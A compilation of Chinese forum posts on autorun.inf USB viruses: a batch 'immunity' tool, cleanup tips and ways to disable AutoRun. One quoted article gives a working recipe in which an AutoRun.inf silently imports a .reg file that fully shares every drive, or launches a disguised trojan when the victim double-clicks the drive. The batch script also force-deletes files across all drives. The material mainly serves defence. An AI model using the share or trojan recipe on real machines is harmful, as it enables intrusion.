关于双击打不开盘符的解决办法-autorun类病毒资料汇总

磁盘 Autorun 病毒清除/免疫工具
[quote]
@Echo Off
color 9f
REM title 移动介质病毒免疫工具
:reg
Rem 无条件禁止自动运行特性防范病毒
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveAutoRun /t REG_BINARY /d ffffff03 /f>nul 2>nul
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000df /f>nul 2>nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000df /f>nul 2>nul
reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000df /f>nul 2>nul
reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000df /f>nul 2>nul
reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000df /f>nul 2>nul
reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000df /f>nul 2>nul
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 0x00000001 /f>nul 2>nul
rem 修复磁盘打开关联
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f>nul 2>nul
rem 杀除U盘病毒进程
taskkill /F /IM ctfmon.exe /IM ctfmon.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe>nul 2>nul
rem 免疫自动运行
echo Y|cacls "%USERPROFILE%\「开始」菜单\程序\启动" /C /P everyone:F>nul 2>nul
echo Y|cacls "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" /C /P everyone:F>nul 2>nul
attrib -s -h -r "%USERPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
attrib -s -h -r "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
del /A /F /S /Q "%USERPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
del /A /F /S /Q "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
rem echo Y|cacls "%USERPROFILE%\「开始」菜单\程序\启动" /C /P everyone:N>nul 2>nul
rem echo Y|cacls "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" /C /P everyone:N>nul 2>nul
:menu1
cls
Echo.
Echo.
Echo   磁盘 Autorun 病毒清除/免疫工具 By 深山红叶
Echo.
Echo 移动磁盘容易受到利用移动设备的自动运行特性而感染和发作的病毒
Echo 的侵袭，而我们无法保证其他的机器中没有这类病毒。
Echo.
Echo 本工具可对移动磁盘进行特别的免疫处理，使得它的自动运行特性完
Echo 失效，从而避免带毒的移动磁盘插入本机后病毒立即自动执行。
Echo 当然，您也完全可以对硬盘分区进行免疫处理。
Echo.
Echo.
Echo [1] 免疫当前系统中所有磁盘
Echo [2] 只免疫指定磁盘或移动磁盘
Echo [3] 退出
Set Choice=
Echo.
Set /P Choice= 请输入要执行的操作，然后按回车：
Echo.
If '%Choice%'=='' goto other
If /I '%Choice%'=='1' GOTO alldisk
If /I '%Choice%'=='2' GOTO setlet
If /I '%Choice%'=='3' GOTO end
Goto menu1
:alldisk
Echo.
Echo 正在免疫！可能需要一小会时间，请稍候……
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls %%a:\autorun.inf /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib -s -h -r %%a:\Autorun.inf>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q %%a:\Autorun.inf>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%a:\Autorun.inf\>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%a:\Autorun.inf\病毒免疫目录不要删除！..\>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%a:\Autorun.inf>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls %%a:\autorun.inf /C /P everyone:R>nul 2>nul
rem 杀除U盘病毒进程
taskkill /F /IM ctfmon.exe /IM ctfmon.exe /IM SVOHOST.exe /IM AdobeR.exe /IM ravmone.exe /IM wincfgs.exe /IM doc.exe /IM rose.exe /IM sxs.exe /IM autorun.exe /IM KB20060111.exe>nul 2>nul
rem 免疫自动运行
echo Y|cacls "%USERPROFILE%\「开始」菜单\程序\启动" /C /P everyone:F>nul 2>nul
echo Y|cacls "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" /C /P everyone:F>nul 2>nul
attrib -s -h -r "%USERPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
attrib -s -h -r "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
del /A /F /S /Q "%USERPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
del /A /F /S /Q "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.exe">nul 2>nul
rem echo Y|cacls "%USERPROFILE%\「开始」菜单\程序\启动" /C /P everyone:N>nul 2>nul
rem echo Y|cacls "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" /C /P everyone:N>nul 2>nul
rem 清除自动加载键值
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SoundMam /f>nul 2>nul
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wincfgs /f>nul 2>nul
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /f>nul 2>nul
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /f>nul 2>nul
rem 清除喜欢利用回收站的移动磁盘自动运行病毒
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycler\*.exe" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycler\*.pif" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycler\*.com" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycled\*.exe" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycled\*.pif" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycled\*.com" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycled\Recycled\*.exe" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycled\Recycled\*.pif" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls "%%a:\Recycled\Recycled\*.com" /C /P everyone:F>nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q "%%a:\Recycled\*.exe">nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q "%%a:\Recycled\*.com">nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q "%%a:\Recycled\*.pif">nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q "%%a:\Recycler\*.exe">nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q "%%a:\Recycler\*.com">nul 2>nul
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do del /A /F /S /Q "%%a:\Recycler\*.pif">nul 2>nul
cls
Echo.
Echo 当前系统的所有磁盘已经成功地进行了自动运行病毒免疫！
Echo 任意键退出……
pause>nul
goto end
:setlet
echo.
Echo.
Set Choice=
Set /P Choice= 请输入要免疫的移动磁盘的盘符，如 F: 然后按回车：
If '%Choice%'=='' goto setlet
echo Y|cacls %Choice%\autorun.inf /C /P everyone:F>nul 2>nul
If Exist %Choice%\Autorun.inf Del /A /F /S /Q %Choice%\Autorun.inf>nul 2>nul
md %Choice%\Autorun.inf\>nul 2>nul
md %Choice%\Autorun.inf\病毒免疫目录不要删除！..\>nul 2>nul
attrib +s +h +r %Choice%\Autorun.inf>nul 2>nul
echo Y|cacls %Choice%\Autorun.inf /P everyone:N>nul
rem 清除回收站可能的病毒
cacls "%Choice%\Recycler\*.exe" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycler\*.pif" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycler\*.com" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycled\*.exe" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycled\*.pif" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycled\*.com" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycled\Recycled\*.exe" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycled\Recycled\*.pif" /C /P everyone:F>nul 2>nul
cacls "%Choice%\Recycled\Recycled\*.com" /C /P everyone:F>nul 2>nul
del /A /F /S /Q "%Choice%\Recycled\*.exe">nul 2>nul
del /A /F /S /Q "%Choice%\Recycled\*.com">nul 2>nulcls
del /A /F /S /Q "%Choice%\Recycled\*.pif">nul 2>nul
Echo.
Echo 指定的磁盘　%Choice%　已经成功地进行了病毒免疫！
:other
Echo.
Echo [1] 继续免疫其他的磁盘 [2] 退出
Set Choice=
Echo.
Set /P Choice= 请输入要执行的操作，然后按回车：
Echo.
If '%Choice%'=='' goto other
If /I '%Choice%'=='1' GOTO setlet
If /I '%Choice%'=='2' GOTO end
Goto other
:End
cls
Echo.
Echo 友情提示：
Echo 如果系统中已经感染了打开磁盘分区即自动运行的病毒，请用本工具
Echo 对所有磁盘进行免疫处理后，立即重启计算机，然后这类病毒就不会
Echo 在打开磁盘时自动运行了。此时只需直接删除病毒文件即可！
Echo.
Echo 任意键退出……
pause>nul
Exit
[/quote]
警惕u盘病毒
[quote]
可以动存储介质也是病毒的传播载体，经常查看一下保持干净很有必要。下面介绍一下u盘常见病毒的原因：
当u盘插入计算机是window\system\usb**.dll将工作已添加这个硬件，如果病毒的作者在这一个地方做手脚，就容易让u盘染上病毒。当然也可以在system32文件夹内放入可执行程序，当我们打开u盘时通过explorer.exe调用相关的执行文件或dll文件在u盘上写上病毒。
处理方法：
1.首先查看u盘是否有毒。
运行-cmd-切换到u盘-dir /a 查看u盘的可以文件，常见的可以文件有autorun.ini autorun.inf recyculer **.exe等
2.如果有利用attrib命令去掉他们的属性，再用del命令删除即可。
如果不知道attrib命令的用法，键入attrib   /?查看一下
attrib -r -a   -s   -h 即可
3.把这些有毒文件删掉一半u盘能够正常。
4.反复添加删除u盘再次利用 dir /a 命令观察u盘是否有问题，如果有问题则是计算机内部的程序没有删除，杀毒即可。
5.对于这一类病毒，如果感觉扫描计算机没有找到，filemonnt这个软件可以帮助你找到，原理就是监控u盘写入文件的进程，找出元凶。
[/quote]

解析来自Autorun.inf文件的攻击
[quote]最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法，由于AutoRun.inf文件在
技术中的应用还是很少见的，相应的资料也不多，有很多人对此觉得很神秘，本文试图为您解开这个迷，使您能完全的了解这个并不复杂却极其有趣的技术。
一、理论基础
经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢？光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是
本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择“重命名”，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容：
[AutoRun]//表示AutoRun部分开始，必须输入
Icon=C:\C.ico//给C盘一个个性化的盘符图标C.ico
Open=C:\1.exe//指定要运行程序的路径和名称，在此为C盘下的1.exe
保存该文件，按F5刷新桌面，再看“我的电脑”中的该盘符（在此为C盘），你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件！
解释一下：“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”为图标文件路径和文件名，你在输入时可以将它改为你的图片文件所在路径和文件名。另外，“.ico”为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。
“Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把“OPEN”行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。
请大家注意：保存的文件名必须是“AutoRun.inf”，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用
做一个自动播放文件，再编上“Autorun”文件，那你就有最酷、最个性的硬盘了。
到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的，
那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句：
shell\标志＝显示的鼠标右键菜单中内容
shell\标志\command＝要执行的文件或命令行
所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可，示例如下：
shell\1=天若有情天亦老
shell\1\command\=notepad ok.txt
保存完毕，按F5键刷新，然后用鼠标右键单击硬盘图标，在弹出菜单中会发现“天若有情天亦老”，点击它，会自动打开硬盘中的“ok.txt”文件。注意：上面示例假设“ok.txt”文件在硬盘根目录下，notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序，则在“command\”后直接添加该执行程序文件名即可。
二、实例
下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个
文件，打开记事本，键入以下内容：
REGEDIT4
'此处一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。
然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：
[AutoRun]
Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息
保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。
如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行！这样做的好处显而易见，那就是大大的增加了木马运行的主动性！须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。
要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被
杀毒
软件识别（具体的方法可以看本刊以前的文章），当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了！
三、防范方法
　　共享分类完全是由flags标志决定的，它的键值决定了共享目录的类型。当flags=0x302时，重新启动系统，目录共享标志消失，表面上看没有共享，实际上该目录正处于完全共享状态。网上流行的共享蠕虫，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盘被共享了，明白了吗？秘密就在这里！
　　以上代码中的Parmlenc、Parm2enc属性项是
加密
的密码，系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算，要想求出密码再进行一次异或运算，然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的，在局域网内从一台机器上可以看到另一台计算机的共享密码。
　　利用TCP/IP协议
设计
的NethackerⅡ软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。
　　解决办法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等删掉。然后删除windows\system\下面的Vserver.vxd删除，它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序，再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉，就会很安全了。
　　另外，关闭硬盘AutoRun功能也是防范
黑客
入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit，打开
注册表
编辑器，展开到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer主键下，在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。
　　双击“NoDriveTypeAutoRun”，在默认状态下（即你没有禁止过AutoRun功能），在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00。其中第一个值“95”是十六进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101，其中每位代表一个设备.
设备名称　　　　 第几位 值 设备用如下数值表示 设备名称含义
　　DKIVE_UNKNOWN　　 0　　1　　01h　　　　　　   不能识别的设备类型
　　DRIVE_NO_ROOT_DIR 1　　0　　02h　　　　　　   没有根目录的驱动器(Drive without root directory)
　　DRIVE_REMOVABLE　　2　　1　　04h　　　　　　   可移动驱动器(Removable drive)
　　DRIVE_FIXED　　　　3　　0　　08h　　　　　　   固定的驱动器(Fixed drive)
　　DRIVE_REMOTE　　   4　　1　　10h　　　　　　   网络驱动器(Network drive)
　　DRIVE_CDROM　　　　5　　0　　20h　　　　　　   光驱(CD-ROM)　　
　　DRIVE_RAMDISK　　 6　　0　　40h　　　　　　   RAM磁盘(RAM Disk)
　　保留　　　　　　   7　　1　　80h　　　　　　   未指定的驱动器类型(Not yet specified drive disk)
　　在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行（默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun”默认键值为95,00,00,00）。
由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。
这样一来，原来的10010101（在表中“值”列中由下向上看）就变成了二进制的10011101，转为十六进制为9D。现在，将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭
注册表
编辑器，重启电脑后就会关闭硬盘的AutoRun功能。
　　如果你看明白了，那你肯定知道该怎样禁止光盘AutoRun功能了，对！就是将DRIVE_CDROM设为1，这样“NoDriveTypeAutoRun”键值中的第一个值就变成了10110101，也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。
　　如果想要恢复硬盘或光驱的AutoRun功能，进行反方向操作即可。
　　事实上，大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序，因此我们完全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun.inf这个文件，
Windows
也不会去运行其中指定的程序，从而可以达到防止
黑客
利用AutoRun.inf文件入侵的目的。
　　除此以外，我们还应让Windows能显示出隐藏的共享。大家都知道，在Windows 9X中设置共享时，通过在共享名后加上“$”这个符号，可使共享隐藏。比如，我们给一个名为share的计算机的C盘设置共享时，只要将其共享名设为C$。这样我们将看不到被共享的C盘，只有通过输入该共享的确切路径，才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。
　　由于在Windows下msnp32.dll会被调用，不能直接修改此文件，所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32，msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32，找到“24 56 E8 17”（位于偏移地址00003190～000031A0处），找到后将“24”改为“00”，然后保存，关闭UltraEdit。重启计算机进入
模式，在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll，重启进入Windows，现在双击share就能看见被隐藏的共享了。
　　最后要提醒大家利用TCP/IP协议
的NethackerⅡ等黑客软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统，给系统打上补丁，经常使用反黑
软件，上网时打开防火墙，注意异常现象，留意AutoRun.inf文件的内容，关闭共享或不要设置为完全共享，且加上复杂的共享密码。
　　声明：本文的目的是使大家能清楚地了解网上流行的黑客手段，增强自己的防护意识，因此请大家不要用本文的方法去干违法的事情，切记：己所不欲，勿施于人!
[/quote]
防病毒的一点心得!
[quote]如果病毒他在生成自身的autorun.inf文件时,先检查系统目录下是否存在autorun.inf文件夹,如果存在就先删除原来的正常的autorun.inf文件夹,然后再建立自身的autorun.inf病毒文件夹而达到系统破坏的目的!
考虑到了一个权限问题,也就是说,如果病毒没有对autorun.inf的完全控制权,那么他对系统的破坏就将宣告失败!我的方法就是把autorun.inf文件夹的权限设置为所有用户都不能完全控制(即读取.写入等)!
注：此种方法只适用于ntfs格式的分区，如果是fat32格式的分区可以通过以下方法进行转换，转换时不会破坏原有数据！如要把c盘转换成ntfs格式，则应在运行对话框中输入cmd，进入命令提示符，然后输入：convert c:/fs:ntfs
方法如下:
1.先去掉使用简单文件共享选项
  打开我的电脑--找到工具栏上的工具选项--选择下面的文件夹选项,即出现文件夹选项对话框,然后定位到查看子选项,在下面的对话框中将使用简单文件共享选项的钩去掉!
2.去掉了使用简单文件共享选项后,在文件夹的属性对话框里面就会多出一个安全选项,这是所要达到的第一步!
3.设置所有用户对文件夹的权限
  找到磁盘根目录下面的autorun.inf文件夹,右键单击选择属性,此时弹出一个autorun.inf属性对话框,然后定位到安全选项卡,下面列出了组和用户对文件夹的操作权限,有administrator,creator owner,system,users及administrator组下面的用户!任意选中一个用户,在用户下面的对话框内就列出了此用户对该文件夹的权限,现在就可以把所有用户的权限改为拒绝完全控制了!
ps:这里面有个creator owner用户的权限是不能更改的,我的理解是创建该文件夹的用户,我到用户组里面找了下,没有看到相关的creator owner用户的说明!这个请各位知道的指教一下咯!对于这里把所有用户的权限都设置为拒绝完全控制,我觉得是完全有必要的,就算病毒拥有了管理员权限他一样不能在磁盘根目录下面生成autorun.inf,而且我们以后也不需要对该文件夹做任何更改!
4.对于有些不是经常更改的系统文件夹,如系统驱动文件夹,我们也可以采取举一反三的方法做同样的设置!现在的病毒要做到自我保护的话,一般都有相关的驱动程序来保护,才能达到死而复生的效果!
5.不要过于相信杀毒软件的能力,现在的病毒入侵电脑后,首要做的就是屏蔽杀毒软件,等杀毒软件更新了病毒库后才能查杀或查杀不是很彻底,但这时你已经中标了!
6.对于现在常见的都是autorun.inf和sxs.exe病毒,那么我们就可以再做完全一点,特别是在可移动磁盘下面分别新建文件名为autorun.inf和sxs.exe!autorun.inf文件的功能是为了实现双击优盘时实现自动运行的目的!而sxs.exe就是病毒源程序,这样设置了以后病毒源程序也不能复制到可移动设置了!设置完成后最好把两个文件夹隐藏起来咯!放心吧,是不会被杀软误报的!这样看起来要美观一点咯!但是可移动设备是不能对文件夹设置权限的咯!
7.可移动设备通过上面的免疫后(在磁盘根目录下新建autorun.inf文件夹),当接入感染了autorun.inf类的病毒的电脑时,将会出现一个运行时间错误的对话框,不要管他,直接确定就是了,一般会出现四个左右!这就是我们所做的免疫起作用了,而不是你的可移动设备上面有病毒哦!
8.对于系统启动时的预读文件夹(windowsPrefetch),当你运行了一些程序时,系统就会自动将其加入这个文件夹,当运行的程序不断地增多,这个文件夹就会随之增大的哦,也可以对其进行拒绝写入权限设置,但建议保留关键的系统应用程序!还有就是系统的驱动文件夹(windowssystem32drivers),现在的病毒或流氓软件每删每有的原因就是其有相关的驱动程序保护,如果不是经常安装一些应用程序的话,建议也对其进行权限设置,这个文件设置为拒绝写入就可以了咯!
9.如果对文件夹设置了所有用户都没有权限访问时,当双击文件夹时会出现windows无法访问的提示哦!这个原因不用我说了吧!
[/quote]
U盘对病毒的传播要借助autorun.inf文件的帮助，病毒首先把自身复制到u盘，然后创建一个autorun.inf,在你双击u盘时，会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建，那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个，但是不管给autorun.inf设置了什么属性，病毒都会更改它，我提到的方法就是，在根目录下，删除autorun.inf文件，然后，根目下建立一个文件夹，名字就叫autorun.inf，这样一来，因为在同一目录下，同名的文件和文件夹不能共存的原理，病毒就无能为力，创建不了autorun.inf文件了,以后会不会出新病毒，自动去删文件夹，然后再建立文件就不知道了，但至少现阶段，这种方法是非常有效的。
如何防止通过优盘传播的病毒！
1.在打开优盘时不要双击打开，也不要用右键菜单的打开选项打开，而要使用资源管理器将其打开，或者使用快捷键winkey+E打开资源管理器后，现选择可移动设备！
2.自己手动在各个盘符的根目录下面创建autorun.inf文件夹或文件.这招对付autorun之类的病毒应该管用，偶现在在使用！根据在同一个目录下面不能创建两个相同的文件原理,病毒如果要创建其自身的autorun文件将不能成功！
3.关闭系统的自动播放功能，方法：运行组策略编辑工具gpedit.msc，找到用户配置选项，选择管理模板子项下面的系统选项，在旁边的对话框中选择“关闭自动播放”，右键选择属性选项，将其设置为已启用，还要在下面的选项里面设置为关闭所有驱动器的自动播放，默认情况下只关闭了CD-ROM的自动播放功能.

[quote]关闭硬盘Autorun功能防止黑客入侵

关闭硬盘AutoRun功能正是防范黑客人侵的有效方法之一。本文的目的就是为大家揭开硬盘
AutoRun功能之谜及关闭该功能的方法。

在“开始”菜单的“运行”中输入Regedit， 打开注册表编辑器，展开到HKEY_CURRE
NT_USER\Software\Microsoft＼Windows＼CurrentVersion＼Policies＼Exploer主键下，
在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的A
utoRun功能。

双击“NoDriveTypeAutoRun”，默认状态下(即你没有禁止过AutoRun功能)，在弹出窗
口中可以看到“NoDriveTypeAutoRun”默认键值为95，00，00，00。其中第一个值“95”
是16进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是1001 01 01，
其中每位代表一个设备，Windows中不同设备会用如下数值表示：

设备名称 第几位 值 设备用如下数值表示设备名称含义
